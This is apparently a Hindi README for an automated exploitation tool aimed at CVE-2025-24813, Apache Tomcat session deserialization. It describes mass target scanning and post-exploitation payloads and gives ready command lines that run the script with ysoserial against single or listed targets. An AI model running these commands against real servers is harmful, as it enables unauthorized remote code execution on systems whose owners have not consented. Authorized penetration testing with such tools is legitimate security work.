
स्वचालित शोषण टूलकिट CVE-2025-24813 के लिए जो Apache Tomcat की असुरक्षित सत्र डिसेरियलाइज़ेशन को लक्षित करता है। इसमें मल्टी-टार्गेट स्कैनिंग, गैजेट चेन परीक्षण, OS पहचान, और पोस्ट-एक्सप्लॉइटेशन पेलोड शामिल हैं।
यह CVE-2025-24813 के लिए एक उन्नत और स्वचालित शोषण उपकरण है, जो असुरक्षित सत्र डिसीरियलाइज़ेशन के प्रति संवेदनशील Apache Tomcat सर्वरों को लक्षित करता है।
--targets / --url)# Single target
python3 exploit_cve_2025_24813.py \
--url http://target:8080 \
--ysoserial ysoserial.jar \
--no-ssl-verify
# Multiple targets from file
python3 exploit_cve_2025_24813.py \
--targets targets.txt \
--ysoserial ysoserial.jar \
--no-ssl-verify
पायथन 3.6+
जावा रनटाइम (ysoserial के लिए)
ysoserial जावा बाइनरी
यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उन सिस्टमों के खिलाफ कोई भी अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है, सख्त वर्जित है और अवैध हो सकता है। 📚 श्रेय
यह प्रोजेक्ट Apache License 2.0 के तहत प्रकाशित एक सार्वजनिक PoC से प्रेरित था। मूल PoC लेखक: absholi7ly द्वारा संवर्धित और पुनर्लिखित mehrdad mirabi